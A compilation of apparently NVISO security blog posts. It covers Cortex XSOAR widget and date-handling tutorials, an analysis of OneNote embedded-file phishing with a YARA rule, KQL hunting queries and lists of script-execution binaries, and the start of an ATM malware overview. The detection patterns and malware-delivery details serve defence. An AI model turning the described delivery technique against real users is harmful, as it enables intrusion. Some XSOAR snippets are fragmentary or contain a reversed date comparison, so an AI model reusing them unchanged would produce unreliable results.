            "sign": "@",
            "colors": {
                "items": {
                    "#00CD33": {
                        "value": 10
                    },
                    "#FAC100": {
                        "value": 20
                    },
                    "green": {
                        "value": 40
                    }
                }
            },
            "type": "above"
        }
    }
}

demisto.results(data)

In contrast, it is much easier for a dashboard:

result = 10
demisto.results(result)

The difference here is that when building a dashboard, you can access the widget builder:

Figure 8: Dashboard widget editor view

Whereas from an incident, you need to explicitly return metadata defining the look and feel of your widget.

Therefore, if we want to make it possible for our automations to be used from a dashboard too, we need to adapt them to return either a simple value if being called from a dashboard, or a wrapped value if called from an incident or indicator.

Our first addition to the existing scripts will be to identify whether we’re being called from a dashboard, we will use the following snippet for this purpose.

is_dashboard = demisto.args().get("widgetType") is not None

This works because dashboards that have automation based widgets add a special argument when calling these automations. This special argument mentions the expected results type and can be found under the key widgetType, it’s presence is a good indication that your automation has been called from a dashboard.

We can now differentiate our outputted results depending on whether or not we are in a dashboard. For that, we separate our incident/indicator results in two, between the actual data and the wrapper. This snippet exposes the statement above applied to our first automation:

number = 53

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
      "stats": number,
......
if is_dashboard:
    demisto.results(number)
else:
    demisto.results(data)

We do this with our three automations and also add the widget tag to them to make them selectable as source for automation-based dashboard widgets. Once added to a dashboard, our widgets look as follows:

Figure 9: Dashboard view of the three widgets

Getting timeframe data from the dashboard

At this point we are powering our widgets with data from Sentinel, but we are always looking at data from the same timeframe. Because dashboards have a time picker, we can instead start to use that data to determine the timeframe we are querying Sentinel for. Extraction of timeframe data from dashboards was covered in this previous blogpost.

We start by adding this line to our automation:

FromDate, ToDate = (
    NitroDateFactory
    .from_regular_xsoar_date_range_args(
        demisto.args()
    )
)

This gives us two NitroDates we can use to craft our Sentinel queries. In our second script which queries a single timeframe, the code becomes:

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{from_}")')

if to_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{to_}")')

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| summarize count() by same"""

The logic we are modifying is the one describing how we craft our Kusto query (the query langage used in Microsoft Sentinel). We previously always had at our disposal a from_ and a to_ string representing the beginning and end of the timeframe we were interested in. With the selection dashboard date range selector, this is not the case anymore, we may get only a start date if the selector is on “3 days ago to now”, or only an end date if the selector is on “up to 3 days ago”. We must then change the logic we use to craft our query in a way that reflects this change. To accomodate this, we replace the between statement with >= and <= statements used to compare the TimeGenerated of an incident to the dates transmitted by the dashboard.

In a similar fashion, we modify the 3rd automation to calculate both the initial timeframe, and the previous timeframe from the dates passed down by the dashboard.

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

from_2 = "2022-09-01T00:00:00+00:00"
to_2 = "2022-10-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        if isinstance(ToDate, NitroRegularDate):
            td = ToDate.date
        else:
            td = datetime.now(timezone.utc)
        delta = td - FromDate.date
        from2 = NitroRegularDate(date=FromDate.date - delta)
        to2 = FromDate
    else:
        from2 = FromDate
        to2 = ToDate

    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None
    if isinstance(from2, NitroRegularDate):
        from_2 = from2.to_iso8601()
    else:
        from_2 = None
    if isinstance(to2, NitroRegularDate):
        to_2 = to2.to_iso8601()
    else:
        to_2 = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f"TimeGenerated >= datetime(\"{from_}\")")

if to_ is not None:
    tmp_query_list.append(f"TimeGenerated < datetime(\"{to_}\")")

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| union (
SecurityIncident"""

tmp_query_list2 = list()

if from_2 is not None:
    tmp_query_list2.append(f"TimeGenerated >= datetime(\"{from_2}\")")

if to_2 is not None:
    tmp_query_list2.append(f"TimeGenerated < datetime(\"{to_2}\")")

if tmp_query_list2:
    query += "\n| where " + " and ".join(tmp_query_list2)

query += """
| extend same = 2)
| summarize count() by same"""

Our dashboard is now fully dynamic, with two widgets presenting data corresponding to the selected timeframe:

Figure 10: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Today”
Figure 11: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Last 7 days”

Looking back

We have covered the use of number widgets throughout Cortex XSOAR in pretty much every scenario, and have managed to make use of all the inputs available to us. Although the process used in this post was centered around number widgets, it should be noted that it can be applied to all other types of widgets.

References

Cortex XSOAR documentation: script based widget examples

Cortex XSOAR documentation: script based widget example 2

Microsoft Azure: Sentinel

Cortex XSOAR marketplace: Azure Log Analytics Integration

Cortex XSOAR documentation: Python code conventions

GIthub: Cortex XSOAR source – EntryTypes

Cortex XSOAR documentation: adding a script to an incident layout

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

OneNote Embedded file abuse

27 February 2023 at 08:00

OneNote in the media

In recent weeks OneNote has gotten a lot of media attention as threat actors are abusing the embedded files feature in OneNote in their phishing campaigns.
I first observed this OneNote abuse in the media via Didier’s post. This was later also mentioned in Xavier’s ISC diary and on the podcast. Later, in the beginning of February, the hacker news covered this as well.

Attack technique

The OneNote feature that is being abused during these phishing campaigns is hiding embedded files behind pictures which entices the user to click the picture. If the picture is clicked, it will execute the file hidden beneath. These files could be executables, JavaScript files, HTML files, PowerShell, …. Basically any type of file that can execute malware when executed. Recently we have also observed the usage of .chm files which have an index.html file embedded that would run inline JavaScript.
On a Windows system this roughly translates to either one of the following processes executing the script/file: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'.

An image of a malicious embedded OneNote file
An image of a malicious embedded OneNote file

Anatomy of a OneNote file

Didier did amazing work in his blogpost where he described how a OneNote file looks like. What is interesting to us, is that OneNote files work with GUIDs to indicate the start of the embedded file section. The GUID that represents the start of an embedded file in OneNote is: {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} Using the following tool we can convert the GUID to a HEX string: e716e3bd65261145a4c48d4d0b7a9eac.
If a HEX editor is used, you can search for this string and find the exact location of the embedded file.
OneNote will then reserve 20 bytes. The first 8 bytes are used to indicate the length of the file, the following 4 bytes are unused and have to be zero, and the last 8 bytes being reserved and also zero. This results in the following HEX string E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 before the embedded file data beings.
When taking a look at the OneNote file through a HEX editor it becomes quickly clear that OneNote does not attempt to encrypt or compress anything. That is if you are looking at a .one file not a .onepkg. A .onepkg file acts similar as a ZIP file that contains the exported files from a OneNote Notebook. It is possible to open these files using 7zip.
The OneNote file (.one) will display the contents of the embedded file as followed:

A OneNote file in a HEX editor, that shows a plaintext embedded file

This means that we can easily check for known false positives while analyzing these files, which brings me to the next point, creating a detection rule.

YARA Rule

It would not be easy to create a detection rule that catches all malicious embedded files as usually scripts do not have a “magic byte” unlike executables which have the famous “MZ” header. While it would be easy to create a YARA rule that looks as the previously observed hex string + the MZ file header, this would only flag embedded executables. If this is your goal then it is a great rule, however I would like something more flexible that I can use on an email gateway to flag all potential malicious incoming OneNote files.
So I took a different approach. I observed that it is common for pictures (e.g.: screenshots) to be embedded in a OneNote file. I did not observe many cases that had other files embedded. This led me to create a YARA rule that would look at a OneNote file, ignore the file sections that indicate that an image is present but would raise an alert when any other file was observed. So instead of looking for Malicious files, I will ignore known legitimate files. This simple trick allowed me to create a high confident detection rule while not overloading analysts with too many false positives.
Of course every environment is different and if it is common for PDF files to be embedded in OneNote files in your environment, you should exclude those PDF files as well. Therefore, it is important to establish a baseline during a testing period.
Below is an example of this technique. The 00‘s after the ?? can be replaced with ?? as well. Although these bytes should always be empty, this rule will not detect the files if the bytes were altered.

rule OneNote_EmbeddedFiles_NoPictures
{
    meta:
        author = "Nicholas Dhaeyer - @DhaeyerWolf"
        date_created = "2023-02-14 - <3"
        date_last_modified = "2023-02-17"
        description = "OneNote files that contain embedded files that are not pictures."
        reference = "https://blog.didierstevens.com/2023/01/22/analyzing-malicious-onenote-documents/"

    strings:
        $EmbeddedFileGUID =  { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC }
        $PNG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4E 47 0D 0A 1A 0A }
        $JPG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF D8 FF }
        $JPG20001 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 6A 50 20 20 0D 0A 87 0A }
        $JPG20002 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF 4F FF 51 }
        $BMP = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 42 4D }
        $GIF = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 47 49 46 }

    condition:
        $EmbeddedFileGUID and (#EmbeddedFileGUID > #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF)
}

The latest version of this rule can be found on my GitHub

The logic behind the rule is as follows; The YARA rule will match any file that has the GUID which defines that an embedded file is present in the OneNote file. Then it will count the amount of GUIDs it has found. If this is more than the amount of GUIDs which are directly followed by an Image file (specified here as #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF) then it means that other files are present and the rule matches. If not, then the file only contains images and is assumed to be safe.
After a file is flagged, an analyst should still take a look at the embedded files. DissectMalware created an amazing python script that helps with the extraction of the embedded files. An analyst or automation system can analyze the file and provide more context if the extracted files are malicious or not.

At the time of writing this blogpost I ran my YARA rule on VirusTotal to see if there were any detections. I only looked back 3 weeks and found more than 4000 files that matched the rule. One of which is d2e6629f8bbca3663e1d76a06042bc1d459d81572936242c44ccc6cd896bfd5c and did not have any detections on VirusTotal at the time of writing. When this file is executed (in the screenshot seen as the one with the filename doc.one), Microsoft detected it as being a Qakbot dropper.

MDE blocking a malicious OneNote file infected with Qakbot

One observation That we have made is that a lot of these malicious OneNote files have an embedded file that is inserted from the Z:\builder\ directory. I suspect that this is where the malware builder tool creates the actual malicious file and then inserts it in the OneNote file. If this is the case, then this can be used to identify and link these files to the tool that is used.

I build a quick POC to parse these files which can be found on my GitHub. Additionally, I created a YARA rule on my GitHub that will look for OneNote files that contain these suspicious folder paths

Execution of a script through OneNote

As I was curious what would happen if a script would be executed in OneNote, I created a Proof Of Concept (POC), a small .bat script that would execute the whoami command.

Microsoft MDE Process execution of the embdedded file

As can be observed above, OneNote as the parent process will execute cmd.exe /c {OneNoteFilePath} where a temporary version of the script is stored and this will be executed.
When looking at File creation events, we also observe that this file is created on disk:

FileCreate event for the path: c:\Users\Hera\AppData\Temp\OneNote\16.0\Exported\{CCA4A94E-126B-489B-8B23-2B2C160D42AC}\NT\0\whoami.bat

As a detection rule, it could prove fruitful to detect OneNote spawning any of the lolbins commonly used for script execution such as the previously mentioned ones: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'. Additionally, looking for file creation or execution events under the path: C:\Users\Hera\AppData\Local\Temp\OneNote\16.0\Exported may give interesting results.

DeviceProcessEvents
| where ProcessCommandLine matches regex @".*C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"
DeviceFileEvents
| where FolderPath matches regex @"C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"

Observations in production environments

At some point I was confused as I saw all these articles about this new way of delivering malware in the media. However, to this point I had not yet seen one infection or flagged email arrive in our SOC. So I did some digging and it turns out that Microsoft is pretty good at preventing this new way of malware delivery.
So let’s show some statistics:
Over a period of 30 days with one client we observed 255 emails that contain a OneNote file:

255 observed emails of the FileType: “one;onenote”

48 of these 255 are not flagged by Microsoft as malicious. The others have been flagged as malicious, meaning that more than 80% of the OneNote attachments are already known as malicious.

Microsoft detecting malicious emails with the filetype: “one;onenote”

When we actually look at what the impact is, we can see that from the 207 malicious emails, only one was delivered.

Evidence of one malicious email being delivered

Which leads me to conclude that at this moment Microsoft is very good at blocking these emails. My hypothesis is because OneNote embedded files are embedded in plain text and without obfuscation and defense evasion of the threat actor, they are very easy to catch with traditional ways of scanning files. Once this changes we might see more impacted cases being reported.

Conclusion

As threat actors are looking for new ways to deliver their malware, we need to be one step ahead to protect our data and users. And while Microsoft has already proven to detect and block these phishing emails, we need to take in consideration that not everyone is running a Microsoft product and that at some point threat actors will find a way to hide their malware better so that it is not as easily detected.
This blog post was meant to take you step by step through the process of creating a YARA detection rule that can help you prevent being compromised with one of these samples. What should be considered when creating a detection rule like this is that you will have to start from a baseline where you know which embedded files are commonly used within your environment. Although this YARA rule can be used in ‘block’ mode, where it will block every email that matches this rule, it is recommended to use this YARA rule in ‘Alert’ mode where an alert for the SOC team is created, and the email is held until analysis of the attachment is done, as this will minimize the impact of possible legitimate files being blocked.
Additionally, my goal of this blog post is to show that you don’t always have to think about flagging files as malicious. You can also do it the other way around and flag files as legitimate, ignore those and focus your attention on the files that have not been flagged. However, this does require a certain security maturity and takes more time to go through the flagged files.

About the Author

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Malware analysis, Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – text

10 February 2023 at 09:00
Cortex XSOAR Tips Tricks – Leveraging dynamic

Introduction

Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC (Security Operation Center) is data availability. As a SOC Analyst, doing a thorough analysis of a security incident requires having access to many pieces of information in order to acquire context on the events you are investigating. In a less mature SOC, this information is at best scattered in many tools, and at worst hardly available. This can be overcome by using multiple data sources to ingest contextual information into your Security Automation and Automated Response platform (SOAR). In turn, this allows you to provide a single pane of glass to the analysts which can then focus on meaningful work, and eliminate data collection from their daily tasks.

Objectives

In this blogpost, we will focus on the use of dynamic sections to customize layouts in Cortex XSOAR. We will show that they can be used to display raw incident data for debugging purposes without cluttering the main workplace of our analysts.

A dynamic section is a layout element which you can add to a layout tab for either an incident or an indicator.
The fundamental difference between it and most other available layout elements is that it is not bound to displaying incident fields or fields of indicators related to the current incident on display, but instead is purely automation based.
This means that upon being rendered, a dynamic section executes an automation, and it is both the specific format and output of that automation that dictates the style and content that will be rendered.

This is not unlike the behavior of field display scripts, but these will be covered in a later post.

Real World Example

As part of our operations as an MSSP (Managed Security Services Provider), we are often faced with alert ingestion issues or mishaps.

One way these occur is that an alert will be fetched into Cortex XSOAR but some of it’s important features will not have been picked up by our extraction logic. This could materialize as missing fields in indicators or missing indicators all together. We may for example have received an alert for suspicious actions taken by a user, yet that very user was not added to the incident as an indicator, nor were details about these actions.

Incident Info tab of a Cortex XSOAR incident – the name of the incident points to unsanctioned cloud app usage by a user, but neither information about the user nor about the unsanctioned app was extracted.

This could happen in many different ways, most commonly that the exact data scheme used by the tool that generated the alert has changed. When this happens, the information we want to extract is present in the alert we fetch, it’s just not located where we’re used to find it. In such cases, a manual inspection of the raw data that came in is sufficient to identify where the data we want can be found. However, as shown in the next screenshot, manually inspecting the raw data of an incident is not that user friendly in Cortex XSOAR.

View of the “Context Data” of an Cortex XSOAR incident – the presentation of the available data is unsuitable for manual inspection

To make it easier, we built our own dynamic section, which displays curated data from both the labels and some entries of an incident. The result is as follows:


In this example, Azure Active Directory identifiers are available and can be leveraged to get the details of the involved user. In a similar manner, the Cloud Application Id is available.

Our dynamic section is powered by an automation that enumerates the labels of the current incident.

ret_labels = {}
incident = demisto.incident()
if not (isinstance(incident, dict) and "labels" in incident.keys()):
	continue
labels = incident["labels"]
if not isinstance(labels, (list, List)):
	continue
for label in labels:

Similarly, it also enumerates specifically tagged war room entries.

ret_notes = {}
investigation_id = demisto.incident()["id"]
uri = f"investigation/{investigation_id}"
body = {
	"pageSize": 100,
	"categories": [],
	"tags": ["raw_data"],
	"notCategories": [],
	"usersAndOperator": False,
	"tagsAndOperator": False,
}
body = json.dumps(body, indent=4)
args = {"uri": uri, "body": body}
res_cmd = demisto.executeCommand("demisto-api-post", args)
for res in res_cmd:
	if not (isinstance(res, dict) and isinstance(contents := res.get("Contents"), dict)):
		continue
	if not isinstance(response := contents.get("response"), dict):
		continue
	if not isinstance(entries := response.get("entries"), (list, List)):
		continue
	for entry in entries:

Once the incident labels are fetched, we extract their contents:

for label in labels:
	if not isinstance(label, dict):
		continue
	label_type, label_value = label.get("type"), label.get("value")
	if not (isinstance(label_type, str) and isinstance(label_value, str)):
		continue
	try:
		label_value = json.loads(label_value)
	except Exception:
		pass
	try:
		ret_labels.update({label_type: label_value})
	except Exception:
		pass

In a similar fashion, for each returned War Room entry, we extract the name of the parent playbook task and the content of the entry:

for entry in entries:
	key = ""
	if not isinstance(entry, dict):
		continue
	if isinstance(entry_id := entry.get("id"), str):
		key += entry_id
	if isinstance(entry_task := entry.get("entryTask"), dict):
		if isinstance(task_name := entry_task.get("taskName"), str):
			key += " - " + task_name
	value = None
	if isinstance(cnt := entry.get("contents"), str):
		try:
			value = json.loads(cnt)
		except Exception:
			value = cnt
	ret_notes.update({key: value})

To tie it all up, and because our goal is to offer a tree like navigable output, we structure our outputted data into a dictionary.

ret = {
	"notes": ret_notes,
	"labels": ret_labels
}

At that point, we cannot just output this dictionary as is, we need to encapsulate it in a way that will indicate to the layout that we want this layout element to be shown as a JSON tree.

results = CommandResults(raw_response = ret)
return_results(results)

By now, our code is good to go and all we need to do is to edit our incident layout to add a new tab and create a new dynamic section powered by the automation we just built.

In Cortex XSOAR, navigate to Settings, Objects setup, Layouts, and either modify an existing layout or create your own. From there you can add a new General Purpose Dynamic Section.

Once your General Purpose Dynamic Section is added to your layout tab, you can edit it and choose the automation it executes. If your automation does not show up in the list of available ones, make sure you added the “dynamic-section” tag to it.

In this blog post, we have shown you how to display complex data in an incident layout which can be used by a security analyst to provide more context. In future posts, we will present more detailed context additions that tie in nicely with the Cortex XSOAR user interface.

References

Palo Alto Cortex XSOAR documentation: how to add a custom widget to the incident and indicator pages

Microsoft Sentinel Cloud Application Entity Identifiers

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Cortex XSOAR Tips & Tricks – Dealing with dates

25 January 2023 at 09:00
Cortex XSOAR Tricks Dealing with dates

Introduction

As an automation platform, Cortex XSOAR fetches data that represents events set at defined moments in time. That metadata is stored within Incidents, will be queried from various systems, and may undergo conversions as it is moves from machines to humans. With its various integrations, Cortex XSOAR ingests datetimes from sources that use different standards, yet manages to keep track of all of them.

Objectives

In this blog post, we will go over dates in Cortex XSOAR, showing where they are presented and used, as well as how they are stored and passed around.
We will present a real world use case for extracting the dates being passed to the elements of a dashboard. With that in mind, we will go deeper onto the technicalities of passing timeframes to widgets and present an object oriented approach to interpreting and converting those, ensuring that this becomes an easy process, even when using third party tools.
The codebase for this post is available on the NVISO Github Repository.

Dates in XSOAR

Let’s look at the use of dates in Cortex XSOAR throughout the GUI and let’s pay attention to the formats we encounter:
Within incident layout tabs, incident fields of type “date” are formatted in a human readable way.

Occurence, Creation, and Last update dates in the Timeline Information GUI widget of an XSOAR Incident.

However in the raw context of an Incident, we see the same dates but stored in the ISO 8601 format:

Multiple datetime fields in the Context GUI of an XSOAR Incident

The dates we can observe in the raw context are formatted to be machine readable, this is what Integrations, Automations, and Playbooks read.

The dates visible in the layout tab are rendered live from those in the context. Cortex XSOAR adapts this view depending on the preferred timezone of the current user, which is saved in it’s user profile. This explains the 1 hour difference between the raw dates and their human readable counterparts in our examples above.

Moving on to the dashboards page, we get a time picker to selectively view Incident and Indicator data restricted to a given period of time. In the next part, we will find out how this time frame is passed down to the underlying code generating the tables and graphs that make up the dashboard. For that purpose, we will build a new dashboard comprised of a single automation based Widget.

Date Range Selector of a XSOAR Dashboard, set to display information from the “Last 7 Days”

The dashboard date picker

We just saw that Dashboards introduce a date picker element, it lets you select both relative timeframes such as “Last 7 days” and explicit timeframes where you define two precise dates in time. To find out how this is effectively passed down, we will use an automation based widget and dump the parameters provided to this automation.

If you need help on creating an automation, please refer to the XSOAR documentation on automations.

Let’s create an automation with the following code, not forgetting to add a ‘widget‘ tag to it.

import json
demisto.results(json.dumps(demisto.args()))

The snippet above will print the arguments passed down to the automation.

To run our automation and get it’s output, we need to create a new dashboard and add a text element to it, it’s content will be populated by our automation. For help on creating a dashboard and automation based widgets, please refer to XSOAR – add a widget to a dashboard and XSOAR – creating a widget automation.

We start our reversing effort by using the dashboard with an explicit timeframe:

Dashboard outpout with the date range “19 Apr 2022 – 22 Apr 2022”

At first glance, we identify the two arguments that interest us, “to” and “from”, each containing an ISO 8601 string corresponding respectively to the lower and higher bounds of our selected timeframe.

When we use relative dates, we get still get ISO 8601 strings, However, the “to” argument now holds a default value pointing to January first of year 1.

Dashboard outpout with the date range “Last 6 months”

Finally, when we use the ‘All dates’ date picker, we get two of these arbitrary strings.

Dashboard outpout with the date range “All times”

The findings above can be understood as being a standard on passing dates and time frames, and we can assume that all builtin Cortex XSOAR content can handle it. However, this may not be the case for third party tools. To interface with the latter, and to create our own dashboard compatible content, we need a way to interpret these dashboard parameters.

Objectives redefinition

We have now identified how the dates that define the beginning and the end of a daterange are passed to the elements of a dashboard, after a user selects that date range in the web interface. This opens new capabilities, as we are now not bound anymore to dashboard elements builtin to Cortex XSOAR, but can start to imagine querying period relevant data in third party systems to visualize in our dashboard.

In a future post, we will use our findings to query Microsoft Sentinel for some Incident data, and display the results of that search in dashboards, as well as within incidents. However, a first hurdle will be that not every system we interact with will blindly accept the from and to fields that Cortex XSOAR passes on to us, especially if we get one of those special values. We will first have to come up with a software wrapper that will let us obtain date objects that we can more easily manipulate in Python.

A proposal for interpreting dates in XSOAR

To use the dates stored in our Cortex XSOAR Incidents, and to build our own automation based dashboard widgets, we have come up with an Object Oriented wrapper.
This wrapper introduces classes to describe both these explicit datetimes and their relative counterparts, as well as factories to craft these out of standard XSOAR parameters.

The following snippet describes the different classes:

from abc import ABC

class NitroDate(ABC):
    pass

class NitroRegularDate(NitroDate):
    def __init__(self, date: datetime = None):
        self.date = date

class NitroUnlimitedPastDate(NitroDate):
    pass

class NitroUnlimitedFutureDate(NitroDate):
    pass

class NitroUndefinedDate(NitroDate):
    pass

NitroDate is an empty parent class, with 4 child classes:

  • NitroRegularDate
  • NitroUnlimitedPastDate
  • NitroUnlimitedFutureDate
  • NitroUndefinedDate

NitroRegularDate represents an explicit date, and stores it as a datetime object.

NitroUnlimitedPastDate and NitroUnlimitedFutureDate are both representations of the special date January 1st year 1, but reflect the context they were mentioned in.

NitroUnlimitedPastDate represents that special value having been passed from a “from” argument, such as with the “Up to X days ago” time picker.

NitroUnlimitedFutureDate represents that special value having been passed from a “to” argument, such as with the “From x days ago” time picker.

Finally, NitroUndefinedDate represents either the special value when we cannot identify the argument it was passed from, or the fact that we could not properly parse a date given in input.

Now that we’ve defined the classes we will use to represent our datetimes, we need to build them, preferably from the data supplied by Cortex XSOAR.

from abc import ABC
from datetime import datetime, timezone
from enum import Enum
import dateutil

class NitroDateHint(Enum):
    Future = 1
    Past = 2
# an Enum used as a flag for functions that build NitroDates


class NitroDateFactory(ABC):
    """this class is a factory, as in it's able to generate NitroDates from a variety of initial arguments"""
    @classmethod
    def from_iso_8601_string(cls, arg: str = ""):
        """
        this function is able to create a NitroDate from an iso 8601 datestring
        :param arg: the iso 8601 string
        :type arg: str
        """
        try:
            date = dateutil.parser.isoparse(arg)
        except Exception as e:
            raise NitroDateParsingError from e
        return NitroRegularDate(date=date)

    @classmethod
    def from_regular_xsoar_date_range_arg(cls, arg: str = "", hint: NitroDateHint = None):
        """
        this function is able to create a NitroDate from a single argument passed by
        a xsoar GUI element and a Hint
        :param arg: the iso 8601 string or cheatlike string
        :type arg: str
        :param hint: a hint to know whether the date, if a predetermined value, should be interpreted as future or past
        :type hint: NitroDateHint
        """
        if arg == "0001-01-01T00:00:00Z":
            if hint is None:
                return NitroUndefinedDate()
            elif hint == NitroDateHint.Future:
                return NitroUnlimitedFutureDate()
            elif hint == NitroDateHint.Past:
                return NitroUnlimitedPastDate()
        else:
            return cls.from_iso_8601_string(arg=arg)

    @classmethod
    def from_regular_xsoar_date_range_args(cls, the_args: dict) -> (NitroDate, NitroDate):
        """
        this function is able to create NitroDates from the two arguments passed by
        a xsoar GUI element
        :param the_args: the args passed to the xsoar automation by the timepicker GUI element
        :type the_args: dict
        """
        ret = [NitroUndefinedDate(), NitroUndefinedDate()]
        if isinstance(the_args, dict):
            for word, i, hint in [("from", 0, NitroDateHint.Past), ("to", 1, NitroDateHint.Future)]:
                if isinstance(tmp := the_args.get(word, None), str):
                    nitro_date = cls.from_regular_xsoar_date_range_arg(arg=tmp, hint=hint)
                    # print(f"arg={tmp}, hint={hint}, date={nitro_date}")
                    if isinstance(nitro_date, NitroDate):
                        ret[i] = nitro_date
        return ret

The Factory presented above eases work during the development of a dashboard widget, by allowing to get two NitroDates with this simple call

FromDate, ToDate = NitroDateFactory.from_regular_xsoar_date_range_args(demisto.args())

The following screenshot demonstrates the use of this factory function and the type and value of it’s outputs when run against Cortex XSOAR data

Screenshot of PyCharm showcasing the use of from_regular_date_range_args

From there on, we can check the type of FromDate and ToDate and more easily build logic to query third party systems. At that stage, the wrapper correctly identifies the datetimes and timeframes, which it returns as standardized python objects, whether they were passed down in a function call or stored in an incident, and is able to detect errors in their formatting.

In a future post, we use this mechanism to query external APIs in a Cortex XSOAR dashboard.

References

NVISO Github Repository

ISO 8601

XSOAR documentation on automations

XSOAR – add a widget to a dashboard

XSOAR – creating a widget automation

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Malware-based attacks on ATMs – A summary

10 January 2023 at 08:00

Introduction

Today we will take a first look at malware-based attacks on ATMs in general, while future articles will go into more detail on the individual subtopics.

ATMs have been robbed by criminal gangs around the world for decades. A successful approach since ~ 20 years is the use of highly flammable gas, which is fed into the ATM safe and ignited during a robbery. For an attacker, this is an inexpensive way to get the cash, but it also leads to great publicity and thus risk of being caught by security authorities. In addition, more and more vending machines are being equipped with systems that ink the money as soon as the machine is physically breached.

Since the beginning of the 2010s, there has been a trend for more and more criminal gangs to switch to non-violent methods without explosives. We are talking about so-called physical malware attacks. Here, malicious software is brought onto the PC inside the ATM, for example, via a USB stick. This malware-based attack usually results in all cash inside the safe being ejected via the regular dispensing mechanism (cash-out attack). A successful attack would effectively put the malware in full command over the ATM thereby rendering it almost impossible to stop them.

Another aspect that cannot be ignored is that an infected ATM often enables attacks on other devices or services within the network. For example, for research and testing purposes, we were able to develop a malware that attacked all ATMs within the network from an infected device (initial ATM). The result was simultaneous cash withdrawal from all ATMs within the shared network. It was also interesting here that other devices such as a Raspberry Pi connected to the same network could achieve the same results as well.

Even though during the Covid pandemic in 2020 such malware-based attacks on ATMs decreased, a clear increase has been visible since the beginning of 2022. Malware to attack specific types of devices can be purchased today for about 1000USD within the darknet.

To protect against such attacks, it is necessary to prevent malware from being installed and executed. Through years of research and experience in real projects, we have been able to help ATM manufacturers and banks protect their devices from such attacks.

ATM Internals

Generally, an ATM consists of two components:

Safe

  • Includes:
    • Cash dispenser
    • Cassettes containing banknotes
  • Strongly protected by heavy locks and armored walls

Cabinet

  • Includes the computer connected to other devices:
    • Card reader
    • Pin pad
    • Touch screen
    • Network components
    • etc.
  • Mostly weakly protected from physical attack.
    • Unarmored: Door and walls are often made of thin plastic or sheet metal.Poor quality locks: locks are often no better than those on private mailboxes, which can be opened in seconds with a lockpick.
    • Often only one key for several ATMs is used.

The computer inside the cabinet usually runs on the Windows operating system, which in turn runs the application for legitimate use of the ATM. A user / bank customer should not be able to break out of this application (e.g. via the touchscreen) to access the underlying system. For this purpose, Windows generally runs in the so-called Kiosk mode, which limits the input options only to the necessary user functions within the application.

